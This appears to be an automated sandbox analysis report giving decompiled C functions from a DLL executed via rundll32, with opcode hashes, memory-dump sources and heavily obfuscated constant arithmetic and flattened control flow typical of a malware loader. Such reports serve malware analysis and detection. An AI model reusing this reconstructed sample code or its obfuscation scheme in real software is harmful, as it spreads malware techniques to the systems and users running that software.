                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =$>@$B$]b.$]b.
                                                                        • API String ID: 0-2184513905
                                                                        • Opcode ID: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
                                                                        • Instruction ID: e65ca6d1074f01d69a0b358cd156f112c6aca70ad4656599cc2acd5269c1bdd2
                                                                        • Opcode Fuzzy Hash: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
                                                                        • Instruction Fuzzy Hash: 7A516372008341ABE358CF61C88991FBBE1FBC8798F108A1DF59652260C7B5DA09DF97
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E10009AE1(signed int __ecx) {
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				unsigned int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				intOrPtr _v72;
                                                                        				intOrPtr _v76;
                                                                        				void* _t124;
                                                                        				signed int _t130;
                                                                        				signed int _t132;
                                                                        				signed int _t133;
                                                                        				intOrPtr* _t145;
                                                                        				intOrPtr* _t148;
                                                                        				intOrPtr* _t150;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        
                                                                        				_t132 = __ecx;
                                                                        				_t148 =  *0x10021400; // 0x0
                                                                        				while(_t148 != 0) {
                                                                        					if( *_t148 != 0) {
                                                                        						 *((intOrPtr*)(_t148 + 0x1c))( *_t148, 0xb, 0);
                                                                        					}
                                                                        					_t148 =  *((intOrPtr*)(_t148 + 0x10));
                                                                        				}
                                                                        				_t133 = _t132 | 0xffffffff;
                                                                        				_pop(_t149);
                                                                        				_t156 = _t155 - 0x40;
                                                                        				_v8 = 0x42f0c0;
                                                                        				_t130 = _t133;
                                                                        				_v4 = 0;
                                                                        				_v32 = 0x6e16;
                                                                        				_t145 = 0x10021400;
                                                                        				_v32 = _v32 * 0x5a;
                                                                        				_v32 = _v32 ^ 0x0026feb4;
                                                                        				_v36 = 0x8b1c;
                                                                        				_v36 = _v36 | 0xe0bb5784;
                                                                        				_v36 = _v36 ^ 0xe0bbe7d8;
                                                                        				_v44 = 0xb12;
                                                                        				_v44 = _v44 ^ 0x7b8ee909;
                                                                        				_v44 = _v44 >> 4;
                                                                        				_v44 = _v44 ^ 0x07b8dae4;
                                                                        				_v60 = 0xab64;
                                                                        				_v60 = _v60 + 0xffff1f21;
                                                                        				_v60 = _v60 ^ 0x0d405f68;
                                                                        				_v60 = _v60 ^ 0x2b3fedb8;
                                                                        				_v60 = _v60 ^ 0xd98056b3;
                                                                        				_v64 = 0x7bd7;
                                                                        				_v64 = _v64 * 0x50;
                                                                        				_v64 = _v64 >> 8;
                                                                        				_v64 = _v64 << 0xb;
                                                                        				_v64 = _v64 ^ 0x0135cdcf;
                                                                        				_v16 = 0xecab;
                                                                        				_v16 = _v16 * 0x2d;
                                                                        				_v16 = _v16 ^ 0x0029a0af;
                                                                        				_v40 = 0xc18d;
                                                                        				_v40 = _v40 + 0x35cc;
                                                                        				_v40 = _v40 + 0x172a;
                                                                        				_v40 = _v40 ^ 0x00011856;
                                                                        				_v20 = 0xa565;
                                                                        				_v20 = _v20 | 0x765f3394;
                                                                        				_v20 = _v20 ^ 0x765fa4be;
                                                                        				_v24 = 0xe1b9;
                                                                        				_v24 = _v24 * 0x49;
                                                                        				_v24 = _v24 ^ 0x00405f3b;
                                                                        				_v48 = 0x2e03;
                                                                        				_v48 = _v48 + 0xf77b;
                                                                        				_v48 = _v48 ^ 0x50a91f1d;
                                                                        				_v48 = _v48 ^ 0x34247e68;
                                                                        				_v48 = _v48 ^ 0x648c5df0;
                                                                        				_v12 = 0x6cf0;
                                                                        				_v12 = _v12 + 0x5895;
                                                                        				_v12 = _v12 ^ 0x0000ed40;
                                                                        				_v52 = 0x996c;
                                                                        				_v52 = _v52 + 0xd3f;
                                                                        				_v52 = _v52 << 0xa;
                                                                        				_v52 = _v52 ^ 0x4e95cfbf;
                                                                        				_v52 = _v52 ^ 0x4c0f105b;
                                                                        				_v56 = 0xb088;
                                                                        				_v56 = _v56 + 0xffff7048;
                                                                        				_v56 = _v56 >> 5;
                                                                        				_v56 = _v56 * 0x1f;
                                                                        				_v56 = _v56 ^ 0x00001ffc;
                                                                        				_v28 = 0xa4f1;
                                                                        				_v28 = _v28 + 0xacd;
                                                                        				_v28 = _v28 ^ 0x0000afbe;
                                                                        				_t150 =  *0x10021400; // 0x0
                                                                        				while(_t150 != 0) {
                                                                        					if( *_t150 == 0) {
                                                                        						L10:
                                                                        						 *_t145 =  *((intOrPtr*)(_t150 + 0x10));
                                                                        						_t124 = E100091CD(_v48, _v12, _v52, _t150, _v56);
                                                                        						_t156 = _t156 + 0xc;
                                                                        					} else {
                                                                        						_t124 = E10017CBC(_v32,  *((intOrPtr*)(_t150 + 4)), _t130, _v36);
                                                                        						if(_t124 != _v28) {
                                                                        							_t117 = _t150 + 0x10; // 0x10
                                                                        							_t145 = _t117;
                                                                        						} else {
                                                                        							 *((intOrPtr*)(_t150 + 0x1c))( *_t150, 0, 0);
                                                                        							E10018C8B(_v56, _v72, _v76,  *_t150);
                                                                        							E100078F0( *((intOrPtr*)(_t150 + 4)), _v28, _v52, _v32, _v36);
                                                                        							_t156 = _t156 + 0x14;
                                                                        							goto L10;
                                                                        						}
                                                                        					}
                                                                        					_t150 =  *_t145;
                                                                        				}
                                                                        				return _t124;
                                                                        			}































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;_@$?$@$h_@$h~$4
                                                                        • API String ID: 0-1313548790
                                                                        • Opcode ID: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
                                                                        • Instruction ID: b19c1ca6e3d31d4d4ef9159ac445c0ba32e9153f74aa0842d826561c908fa0a9
                                                                        • Opcode Fuzzy Hash: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
                                                                        • Instruction Fuzzy Hash: 46610EB55083419FE354CF21C48940BFBF1FB88798F505E1DF596662A0C3B5AA89CF86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10007605() {
                                                                        				char _v520;
                                                                        				signed int _v524;
                                                                        				intOrPtr _v528;
                                                                        				signed int _v532;
                                                                        				signed int _v536;
                                                                        				signed int _v540;
                                                                        				signed int _v544;
                                                                        				signed int _v548;
                                                                        				signed int _v552;
                                                                        				signed int _v556;
                                                                        				signed int _v560;
                                                                        				signed int _v564;
                                                                        				signed int _v568;
                                                                        				signed int _t110;
                                                                        				void* _t118;
                                                                        				signed int _t120;
                                                                        				signed int _t135;
                                                                        				signed int _t136;
                                                                        				short* _t137;
                                                                        				signed int* _t140;
                                                                        
                                                                        				_t140 =  &_v568;
                                                                        				_v524 = _v524 & 0x00000000;
                                                                        				_v528 = 0x1387ac;
                                                                        				_t118 = 0x4e41429;
                                                                        				_v552 = 0x9cc8;
                                                                        				_v552 = _v552 * 0xb;
                                                                        				_v552 = _v552 | 0x98122ffa;
                                                                        				_v552 = _v552 ^ 0x9816c8f2;
                                                                        				_v548 = 0xc79b;
                                                                        				_v548 = _v548 << 5;
                                                                        				_v548 = _v548 >> 6;
                                                                        				_v548 = _v548 ^ 0x00001472;
                                                                        				_v560 = 0x2de7;
                                                                        				_t135 = 0xb;
                                                                        				_v560 = _v560 / _t135;
                                                                        				_v560 = _v560 >> 0xf;
                                                                        				_v560 = _v560 | 0x0a536918;
                                                                        				_v560 = _v560 ^ 0x0a532199;
                                                                        				_v536 = 0x89b4;
                                                                        				_v536 = _v536 + 0xffff0cb8;
                                                                        				_v536 = _v536 ^ 0xffffc1bc;
                                                                        				_v532 = 0xdd21;
                                                                        				_v532 = _v532 + 0xb061;
                                                                        				_v532 = _v532 ^ 0x0001daa7;
                                                                        				_v564 = 0x77e3;
                                                                        				_t136 = 0x1c;
                                                                        				_v564 = _v564 * 0x76;
                                                                        				_v564 = _v564 << 0xc;
                                                                        				_v564 = _v564 + 0xffff5cda;
                                                                        				_v564 = _v564 ^ 0x74296bf4;
                                                                        				_v556 = 0x240d;
                                                                        				_t110 = _v556 / _t136;
                                                                        				_v556 = _t110;
                                                                        				_v556 = _v556 + 0xcc42;
                                                                        				_v556 = _v556 >> 7;
                                                                        				_v556 = _v556 ^ 0x00001fe6;
                                                                        				_v544 = 0x5b3d;
                                                                        				_v544 = _v544 + 0xffffa256;
                                                                        				_v544 = _v544 ^ 0xffff9726;
                                                                        				_t137 = _v544;
                                                                        				_v540 = 0x5d73;
                                                                        				_v540 = _v540 + 0xffff95f2;
                                                                        				_v540 = _v540 ^ 0xffff9ed1;
                                                                        				L1:
                                                                        				while(_t118 != 0x2493963) {
                                                                        					if(_t118 == 0x4e41429) {
                                                                        						_t118 = 0x2493963;
                                                                        						continue;
                                                                        					}
                                                                        					if(_t118 == 0x95c6af5) {
                                                                        						return E10015891(_t137,  *0x100221b0 + 0x10, _v556, _v544, _v540);
                                                                        					}
                                                                        					if(_t118 != 0x1ce20f0e) {
                                                                        						L15:
                                                                        						__eflags = _t118 - 0x278615fa;
                                                                        						if(__eflags != 0) {
                                                                        							continue;
                                                                        						}
                                                                        						return _t110;
                                                                        					}
                                                                        					_v568 = 0x3f77;
                                                                        					_v568 = _v568 ^ 0x040fc81f;
                                                                        					_t120 = 0x71;
                                                                        					_v568 = _v568 / _t120;
                                                                        					_v568 = _v568 >> 4;
                                                                        					_v568 = _v568 ^ 0x00009342;
                                                                        					_t137 =  &_v520 + E1001BBAB(_v536, _v532,  &_v520, _v564) * 2;
                                                                        					while(1) {
                                                                        						_t110 =  &_v520;
                                                                        						if(_t137 <= _t110) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags =  *_t137 - 0x5c;
                                                                        						if( *_t137 != 0x5c) {
                                                                        							L8:
                                                                        							_t137 = _t137 - 2;
                                                                        							__eflags = _t137;
                                                                        							continue;
                                                                        						}
                                                                        						_t94 =  &_v568;
                                                                        						 *_t94 = _v568 - 1;
                                                                        						__eflags =  *_t94;
                                                                        						if( *_t94 == 0) {
                                                                        							__eflags = _t137;
                                                                        							L12:
                                                                        							_t118 = 0x95c6af5;
                                                                        							goto L1;
                                                                        						}
                                                                        						goto L8;
                                                                        					}
                                                                        					goto L12;
                                                                        				}
                                                                        				_t110 = E10008C0C(_v552, __eflags, _v548, _v560,  &_v520);
                                                                        				_t140 =  &(_t140[3]);
                                                                        				_t118 = 0x1ce20f0e;
                                                                        				goto L15;
                                                                        			}
























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$=[$s]$w?$w
                                                                        • API String ID: 0-3700477970
                                                                        • Opcode ID: 62ff0d1c6547e0b70e078bd31fc65c68330c9ee5d58cb8db6e1cf70575695e7b
                                                                        • Instruction ID: 1a6987bc6c1846451349bb2a40725533db3d3377cb45e9f1ccf3a4716e170320
                                                                        • Opcode Fuzzy Hash: 62ff0d1c6547e0b70e078bd31fc65c68330c9ee5d58cb8db6e1cf70575695e7b
                                                                        • Instruction Fuzzy Hash: DC51497190C3429FE364CF25D44941FBBE1FBC4798F104A1EF599662A4D3B89A49CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E100094EC() {
                                                                        				char _v524;
                                                                        				signed int _v528;
                                                                        				signed int _v532;
                                                                        				signed int _v536;
                                                                        				signed int _v540;
                                                                        				signed int _v544;
                                                                        				signed int _v548;
                                                                        				signed int _v552;
                                                                        				signed int _v556;
                                                                        				signed int _v560;
                                                                        				signed int _v564;
                                                                        				signed int _v568;
                                                                        				signed int _v572;
                                                                        				signed int _v576;
                                                                        				signed int _v580;
                                                                        				signed int _v584;
                                                                        				signed int _v588;
                                                                        				signed int _v592;
                                                                        				signed int _v596;
                                                                        				signed int _v600;
                                                                        				signed int _v604;
                                                                        				short* _t218;
                                                                        				void* _t223;
                                                                        				signed int _t258;
                                                                        				signed int _t259;
                                                                        				signed int _t260;
                                                                        				signed int _t261;
                                                                        				signed int _t262;
                                                                        				signed int _t263;
                                                                        				signed int _t264;
                                                                        				signed int _t270;
                                                                        				void* _t272;
                                                                        
                                                                        				_t272 = (_t270 & 0xfffffff8) - 0x258;
                                                                        				_v552 = 0xc5de;
                                                                        				_v552 = _v552 << 0xb;
                                                                        				_t223 = 0x10e191ba;
                                                                        				_v552 = _v552 * 0xa;
                                                                        				_v552 = _v552 ^ 0x3dd55649;
                                                                        				_v528 = 0xd7a0;
                                                                        				_v528 = _v528 ^ 0xb5a30bcc;
                                                                        				_v528 = _v528 ^ 0xb5a3bef7;
                                                                        				_v576 = 0xa7dd;
                                                                        				_v576 = _v576 << 0xe;
                                                                        				_t258 = 0x27;
                                                                        				_v576 = _v576 / _t258;
                                                                        				_v576 = _v576 ^ 0x011311a2;
                                                                        				_v588 = 0x76f2;
                                                                        				_v588 = _v588 | 0xcad6357e;
                                                                        				_v588 = _v588 ^ 0x58bbddc5;
                                                                        				_v588 = _v588 ^ 0x926db7d7;
                                                                        				_v604 = 0x542d;
                                                                        				_v604 = _v604 ^ 0xdabf7200;
                                                                        				_v604 = _v604 | 0x518ac0ce;
                                                                        				_v604 = _v604 + 0xffff5d7d;
                                                                        				_v604 = _v604 ^ 0xdbbf6591;
                                                                        				_v536 = 0x6f2;
                                                                        				_v536 = _v536 ^ 0xb7ff586a;
                                                                        				_v536 = _v536 ^ 0xb7ff59fe;
                                                                        				_v564 = 0x9bc0;
                                                                        				_t259 = 0x60;
                                                                        				_v564 = _v564 * 0x77;
                                                                        				_v564 = _v564 + 0xffff74e2;
                                                                        				_v564 = _v564 ^ 0x0047e104;
                                                                        				_v556 = 0xec1b;
                                                                        				_v556 = _v556 * 0x26;
                                                                        				_v556 = _v556 >> 3;
                                                                        				_v556 = _v556 ^ 0x0004652b;
                                                                        				_v568 = 0x50db;
                                                                        				_v568 = _v568 / _t259;
                                                                        				_v568 = _v568 << 8;
                                                                        				_v568 = _v568 ^ 0x0000bb9e;
                                                                        				_v540 = 0x45e;
                                                                        				_t260 = 0x2a;
                                                                        				_v540 = _v540 / _t260;
                                                                        				_v540 = _v540 ^ 0x00003856;
                                                                        				_v600 = 0xdcf5;
                                                                        				_v600 = _v600 >> 0xb;
                                                                        				_t261 = 0x55;
                                                                        				_v600 = _v600 / _t261;
                                                                        				_v600 = _v600 + 0xffff3d4e;
                                                                        				_v600 = _v600 ^ 0xffff3115;
                                                                        				_v544 = 0xeb2c;
                                                                        				_v544 = _v544 | 0xbe9f19ff;
                                                                        				_v544 = _v544 ^ 0xbe9ffb48;
                                                                        				_v560 = 0x6b9e;
                                                                        				_v560 = _v560 | 0x0e8ada92;
                                                                        				_v560 = _v560 + 0xfffff2fa;
                                                                        				_v560 = _v560 ^ 0x0e8af134;
                                                                        				_v572 = 0xb259;
                                                                        				_v572 = _v572 ^ 0x7ea6fcad;
                                                                        				_v572 = _v572 * 0x50;
                                                                        				_v572 = _v572 ^ 0x93f8b0e2;
                                                                        				_v596 = 0x3f12;
                                                                        				_t262 = 0x14;
                                                                        				_v596 = _v596 * 0x3e;
                                                                        				_v596 = _v596 | 0x39de80ab;
                                                                        				_v596 = _v596 + 0x6fd8;
                                                                        				_v596 = _v596 ^ 0x39e00adb;
                                                                        				_v548 = 0xf59e;
                                                                        				_v548 = _v548 >> 0xd;
                                                                        				_v548 = _v548 ^ 0x00004a18;
                                                                        				_v532 = 0xef88;
                                                                        				_v532 = _v532 / _t262;
                                                                        				_v532 = _v532 ^ 0x00005e97;
                                                                        				_v580 = 0xce2c;
                                                                        				_t263 = 0x1d;
                                                                        				_v580 = _v580 * 0x38;
                                                                        				_v580 = _v580 / _t263;
                                                                        				_v580 = _v580 ^ 0x00019ca1;
                                                                        				_v584 = 0xcb97;
                                                                        				_t264 = 0x7c;
                                                                        				_v584 = _v584 * 0x5a;
                                                                        				_v584 = _v584 * 0x11;
                                                                        				_v584 = _v584 ^ 0x04c0b349;
                                                                        				_v592 = 0xb13f;
                                                                        				_v592 = _v592 / _t264;
                                                                        				_v592 = _v592 * 0x6b;
                                                                        				_v592 = _v592 | 0xb06a3ec2;
                                                                        				_v592 = _v592 ^ 0xb06acb10;
                                                                        				do {
                                                                        					while(_t223 != 0xd11567f) {
                                                                        						if(_t223 == 0xdefeb70) {
                                                                        							_push(0x10001000);
                                                                        							_push(_v576);
                                                                        							E100163BF(E1001BF25(_v552, _v528, __eflags), __eflags, _v604, _v536,  &_v524,  *0x100221b0 + 0x234, _v564,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v556);
                                                                        							_t218 = E1001C5F7(_v568, _v540, _v600, _v544, _t215);
                                                                        							_t272 = _t272 + 0x2c;
                                                                        							_t223 = 0x285c1f68;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t223 == 0x10e191ba) {
                                                                        								_t223 = 0xdefeb70;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t223 == 0x285c1f68) {
                                                                        									_t218 = E10001E13(_v560, _v572, _v596, _v548,  &_v524);
                                                                        									_t272 = _t272 + 0xc;
                                                                        									 *_t218 = 0;
                                                                        									_t223 = 0xd11567f;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					E10004EA1( &_v524, _v532, _v580, _v584,  &_v524, E10017570, _v592, 0);
                                                                        					_t272 = _t272 + 0x18;
                                                                        					_t223 = 0x1084920c;
                                                                        					L9:
                                                                        					__eflags = _t223 - 0x1084920c;
                                                                        				} while (__eflags != 0);
                                                                        				return _t218;
                                                                        			}




































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,$-T$V8$p
                                                                        • API String ID: 0-3916372523
                                                                        • Opcode ID: fe2cff7067093b2d558a9cecacae9b5ad41a5273b9a4ffd5d244425a66effca3
                                                                        • Instruction ID: 69ffcb7ec9cb319a1ce736737d15c81d771b3a6a0237c0b4041a3b002347b657
                                                                        • Opcode Fuzzy Hash: fe2cff7067093b2d558a9cecacae9b5ad41a5273b9a4ffd5d244425a66effca3
                                                                        • Instruction Fuzzy Hash: 80A130711093419FE358CF26C98680BFBF1FBC5758F40891DF6A69A2A0D3B599098F82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E100177C0(signed int __ecx, intOrPtr* __edx) {
                                                                        				char _v520;
                                                                        				signed int _v524;
                                                                        				signed int _v528;
                                                                        				unsigned int _v532;
                                                                        				signed int _v536;
                                                                        				signed int _v540;
                                                                        				signed int _v544;
                                                                        				signed int _v548;
                                                                        				signed int _v552;
                                                                        				signed int _v556;
                                                                        				signed int _v560;
                                                                        				signed int _v564;
                                                                        				intOrPtr _t112;
                                                                        				intOrPtr _t115;
                                                                        				signed int _t117;
                                                                        				signed int _t120;
                                                                        				signed int _t122;
                                                                        				signed int _t123;
                                                                        				void* _t124;
                                                                        				signed int _t136;
                                                                        				void* _t137;
                                                                        				signed int _t140;
                                                                        				intOrPtr* _t143;
                                                                        				signed int* _t144;
                                                                        
                                                                        				_t144 =  &_v564;
                                                                        				_v532 = 0x1772;
                                                                        				_v532 = _v532 * 0x5a;
                                                                        				_t143 = __edx;
                                                                        				_v532 = _v532 >> 9;
                                                                        				_v532 = _v532 ^ 0x00005570;
                                                                        				_t120 = __ecx;
                                                                        				_v536 = 0xd4de;
                                                                        				_t137 = 0xee39a7c;
                                                                        				_v536 = _v536 + 0xf33a;
                                                                        				_v536 = _v536 ^ 0x38a2f836;
                                                                        				_v536 = _v536 ^ 0x38a37f8b;
                                                                        				_v548 = 0x7513;
                                                                        				_v548 = _v548 | 0x052e2a6a;
                                                                        				_v548 = _v548 ^ 0x1a009472;
                                                                        				_v548 = _v548 ^ 0x1f2ec1f2;
                                                                        				_v524 = 0xa699;
                                                                        				_v524 = _v524 ^ 0x09ca44e2;
                                                                        				_v524 = _v524 ^ 0x09cad658;
                                                                        				_v564 = 0x9128;
                                                                        				_v564 = _v564 >> 2;
                                                                        				_v564 = _v564 << 9;
                                                                        				_v564 = _v564 | 0x50e7f59d;
                                                                        				_v564 = _v564 ^ 0x50ef90e4;
                                                                        				_v556 = 0x80f2;
                                                                        				_v556 = _v556 >> 0xb;
                                                                        				_v556 = _v556 ^ 0x31791c1d;
                                                                        				_v556 = _v556 + 0x8ae1;
                                                                        				_v556 = _v556 ^ 0x3179d51e;
                                                                        				_v540 = 0x4387;
                                                                        				_t122 = 0x3f;
                                                                        				_v540 = _v540 / _t122;
                                                                        				_v540 = _v540 ^ 0x58e2e29e;
                                                                        				_v540 = _v540 ^ 0x58e2cc49;
                                                                        				_v552 = 0xa082;
                                                                        				_v552 = _v552 ^ 0xcad17016;
                                                                        				_v552 = _v552 + 0xffff4873;
                                                                        				_v552 = _v552 ^ 0x78230127;
                                                                        				_v552 = _v552 ^ 0xb2f23b2e;
                                                                        				_v528 = 0x3f9f;
                                                                        				_t123 = 0x42;
                                                                        				_v528 = _v528 / _t123;
                                                                        				_v528 = _v528 ^ 0x00000484;
                                                                        				_t136 = _v528;
                                                                        				_v560 = 0x7d41;
                                                                        				_v560 = _v560 << 4;
                                                                        				_v560 = _v560 * 0x2b;
                                                                        				_v560 = _v560 >> 0xf;
                                                                        				_v560 = _v560 ^ 0x00006e49;
                                                                        				_v544 = 0x2431;
                                                                        				_v544 = _v544 ^ 0x7eed52f8;
                                                                        				_v544 = _v544 | 0x8f6fe496;
                                                                        				_v544 = _v544 ^ 0xffefc65f;
                                                                        				while(_t137 != 0x5fcbc3f) {
                                                                        					if(_t137 != 0xee39a7c) {
                                                                        						if(_t137 == 0x11ea9c68) {
                                                                        							_push( &_v520);
                                                                        							_t117 = E10002628(_t120, _t143);
                                                                        							asm("sbb esi, esi");
                                                                        							_t123 = 0x10001318;
                                                                        							_t140 =  ~_t117 & 0x1fda4e6f;
                                                                        							goto L7;
                                                                        						} else {
                                                                        							if(_t137 == 0x1790ebe1) {
                                                                        								return E100091CD(_v552, _v528, _v560, _t136, _v544);
                                                                        							}
                                                                        							_t151 = _t137 - 0x376b3a50;
                                                                        							if(_t137 != 0x376b3a50) {
                                                                        								L12:
                                                                        								__eflags = _t137 - 0x7fc7711;
                                                                        								if(__eflags != 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									return _t117;
                                                                        								}
                                                                        								L16:
                                                                        							} else {
                                                                        								_push(_v540);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_push(_t123);
                                                                        								_push(_v556);
                                                                        								_push(_v564);
                                                                        								_t123 = _v548;
                                                                        								_push( &_v520);
                                                                        								_push(0);
                                                                        								_t117 = E100189F6(_t123, _v524, _t151);
                                                                        								_t144 =  &(_t144[8]);
                                                                        								asm("sbb esi, esi");
                                                                        								_t140 =  ~_t117 & 0xee6bd05e;
                                                                        								L7:
                                                                        								_t137 = _t140 + 0x1790ebe1;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t124 = 0x24;
                                                                        					_t115 = E100157E8(_t124);
                                                                        					_t136 = _t115;
                                                                        					_t123 = _t123;
                                                                        					__eflags = _t136;
                                                                        					if(__eflags != 0) {
                                                                        						_t137 = 0x11ea9c68;
                                                                        						continue;
                                                                        					}
                                                                        					return _t115;
                                                                        					goto L16;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t136 + 0x20)) = _t120;
                                                                        				_t137 = 0x7fc7711;
                                                                        				_t112 =  *0x10021400; // 0x0
                                                                        				 *((intOrPtr*)(_t136 + 0x10)) = _t112;
                                                                        				 *0x10021400 = _t136;
                                                                        				goto L12;
                                                                        			}



























                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10017979
                                                                        0x10017979
                                                                        0x10017981
                                                                        0x10017983
                                                                        0x10017985
                                                                        0x10017986
                                                                        0x1001798a
                                                                        0x10017992
                                                                        0x10017996
                                                                        0x10017997
                                                                        0x10017999
                                                                        0x1001799e
                                                                        0x100179a5
                                                                        0x100179a7
                                                                        0x100179ad
                                                                        0x100179ad
                                                                        0x00000000
                                                                        0x100179ad
                                                                        0x10017973
                                                                        0x1001795f
                                                                        0x100179e3
                                                                        0x100179e4
                                                                        0x100179e9
                                                                        0x100179eb
                                                                        0x100179ec
                                                                        0x100179ee
                                                                        0x100179f0
                                                                        0x00000000
                                                                        0x100179f0
                                                                        0x10017a41
                                                                        0x00000000
                                                                        0x10017a41
                                                                        0x100179fa
                                                                        0x100179fd
                                                                        0x10017a02
                                                                        0x10017a07
                                                                        0x10017a0a
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 1$$In$P:k7$pU
                                                                        • API String ID: 0-2106264963
                                                                        • Opcode ID: a6b8b6057752e44647db78beeb2ee1f3202c3f20c0f29efe6dfe5a7aead6b88d
                                                                        • Instruction ID: 2e7f08dc6bef0bd5653fe598f332924a89a4fdabe7864c0509b3b532d9c0389b
                                                                        • Opcode Fuzzy Hash: a6b8b6057752e44647db78beeb2ee1f3202c3f20c0f29efe6dfe5a7aead6b88d
                                                                        • Instruction Fuzzy Hash: D2516B719083419BD358DF21D48694BBBF0FBC8758F501A1DF9DAAA260C3B4DA49CB87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E1001DEE8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				intOrPtr _v60;
                                                                        				void* _t134;
                                                                        				signed int _t151;
                                                                        				signed int _t152;
                                                                        				signed int _t153;
                                                                        				signed int _t154;
                                                                        				signed int _t155;
                                                                        
                                                                        				_push(_a16);
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t134);
                                                                        				_v56 = _v56 & 0x00000000;
                                                                        				_v60 = 0x429fa3;
                                                                        				_v16 = 0x8df8;
                                                                        				_v16 = _v16 | 0x5bad6fdd;
                                                                        				_v16 = _v16 ^ 0x1c317be5;
                                                                        				_v16 = _v16 ^ 0x479cc3d4;
                                                                        				_v12 = 0xa64d;
                                                                        				_t151 = 0x35;
                                                                        				_v12 = _v12 / _t151;
                                                                        				_v12 = _v12 + 0xfffff8cf;
                                                                        				_v12 = _v12 | 0x0b89d292;
                                                                        				_v12 = _v12 ^ 0xffff912a;
                                                                        				_v8 = 0x343c;
                                                                        				_v8 = _v8 + 0xdfbd;
                                                                        				_v8 = _v8 >> 9;
                                                                        				_v8 = _v8 ^ 0x831c11fe;
                                                                        				_v8 = _v8 ^ 0x831c1bf9;
                                                                        				_v20 = 0xd2ea;
                                                                        				_v20 = _v20 << 0xb;
                                                                        				_v20 = _v20 + 0xffff01f9;
                                                                        				_t152 = 0x3f;
                                                                        				_v20 = _v20 / _t152;
                                                                        				_v20 = _v20 ^ 0x001a8b92;
                                                                        				_v52 = 0xabad;
                                                                        				_v52 = _v52 ^ 0xf345eb5d;
